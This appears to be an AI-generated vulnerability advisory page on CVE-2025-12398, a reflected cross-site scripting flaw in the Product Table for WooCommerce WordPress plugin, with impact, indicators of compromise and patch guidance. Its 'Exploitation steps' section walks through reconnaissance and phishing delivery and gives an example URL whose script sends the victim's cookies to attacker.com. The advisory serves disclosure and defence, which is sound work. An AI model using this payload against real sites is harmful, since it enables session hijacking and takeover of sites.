CVE-2025-12398: 
WordPress vulnerability analysis and mitigation

Overview

CVE-2025-12398 is a Reflected Cross-Site Scripting (XSS) vulnerability in the Product Table for WooCommerce WordPress plugin, developed by woobewoo/codersaiful. The flaw exists in all versions up to and including 5.0.8, stemming from insufficient input sanitization and output escaping of the search_key parameter. It was published on December 21, 2025, with Wordfence credited as the assigning authority. The vulnerability carries a CVSS v3.1 base score of 6.1 (Medium) (Wordfence, Red Hat CVE).

Technical details

The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting). The search_key parameter accepted by the plugin is neither properly sanitized on input nor escaped on output, allowing arbitrary JavaScript to be reflected back in the HTTP response. Because the attack vector is network-based and requires no authentication or elevated privileges, an unauthenticated attacker can craft a malicious URL containing a JavaScript payload and deliver it to a victim; when the victim clicks the link, the script executes in their browser within the context of the target WordPress site (CAPEC-591: Reflected XSS) (Wordfence, ENISA EUVD).

Impact

Successful exploitation allows an attacker to execute arbitrary JavaScript in the browser of any user who clicks a crafted link, operating within the security context of the affected WordPress site. This can lead to session cookie theft, credential harvesting, defacement of page content visible to the victim, or redirection to malicious sites. While confidentiality and integrity impacts are rated Low and availability is unaffected, administrative users tricked into clicking such a link could expose privileged session tokens, potentially enabling site takeover (Wordfence, ENISA EUVD).

Exploitability

No public exploit code or active in-the-wild exploitation has been reported as of the time of publication. The EPSS score is approximately 0.074%, indicating a low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. User interaction is required (the victim must click a crafted link), which limits opportunistic mass exploitation, though phishing campaigns targeting WordPress site administrators remain a realistic attack scenario (Wordfence, Feedly).

Exploitation steps

  1. Reconnaissance: Identify WordPress sites running the Product Table for WooCommerce plugin (versions ≤ 5.0.8) using tools like WPScan, Shodan, or Google dorks (e.g., inurl:woo-product-table).
  2. Identify the vulnerable parameter: Locate a page on the target site that renders the product table with a search feature, which exposes the search_key GET/POST parameter.
  3. Craft a malicious URL: Construct a URL targeting the vulnerable endpoint with a reflected XSS payload in the search_key parameter, for example:
    https://victim-site.com/shop/?search_key=<script>document.location='https://attacker.com/steal?c='+document.cookie</script>
  4. Deliver the payload: Send the crafted URL to a target user (e.g., a WordPress administrator) via phishing email, social engineering, or a malicious link embedded in a forum or comment.
  5. Harvest results: When the victim clicks the link and the page loads, the injected script executes in their browser, exfiltrating session cookies or performing actions on behalf of the victim to the attacker-controlled server (Wordfence).

Indicators of compromise

  • Network: Outbound HTTP requests from victim browsers to unexpected external domains immediately after loading a product table page; unusual referrer headers in web server logs pointing to crafted URLs containing search_key with encoded script tags.
  • Logs: WordPress or web server access logs showing GET/POST requests to product table pages with search_key values containing <script>, javascript:, onerror=, or URL-encoded equivalents (e.g., %3Cscript%3E).
  • Browser/Session: Unexpected session invalidation or new admin sessions created shortly after a user visits a product table URL with an unusual search_key value; reports from users of unexpected redirects after clicking product table links.

Mitigation and workarounds

Site owners should update the Product Table for WooCommerce plugin to version 5.0.9 or later, which addresses the insufficient sanitization and escaping of the search_key parameter. The fix is documented in the WordPress plugin repository changeset (WordPress Changeset). As an interim measure, a Web Application Firewall (WAF) rule blocking reflected XSS patterns in the search_key parameter can reduce exposure. Administrators should also ensure WordPress user accounts use strong, unique passwords and enable multi-factor authentication to limit the impact of any session compromise (Wordfence).

Community reactions

The vulnerability was reported and assigned by Wordfence, a leading WordPress security firm, as part of their routine plugin vulnerability disclosure program. It was also indexed by ENISA's European Vulnerability Database (EUVD-2025-204661) and noted by automated CVE tracking accounts on Bluesky. No significant independent researcher commentary or major media coverage has been identified beyond standard vulnerability database aggregation (Wordfence, ENISA EUVD).

Additional resources


Source: This report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-86850MEDIUM6.5
  • sku-error-fixer-for-woocommerce
NoNoOct 06, 2026
CVE-2026-88931MEDIUM5.3
  • social-web-suite
NoNoOct 06, 2026
CVE-2026-87841MEDIUM5.3
  • unitechpay-paiements-mobile-money
NoNoOct 06, 2026
CVE-2026-92990MEDIUM5.3
  • sendpress
NoNoOct 06, 2026
CVE-2026-92989MEDIUM4.3
  • sendpress
NoNoOct 06, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management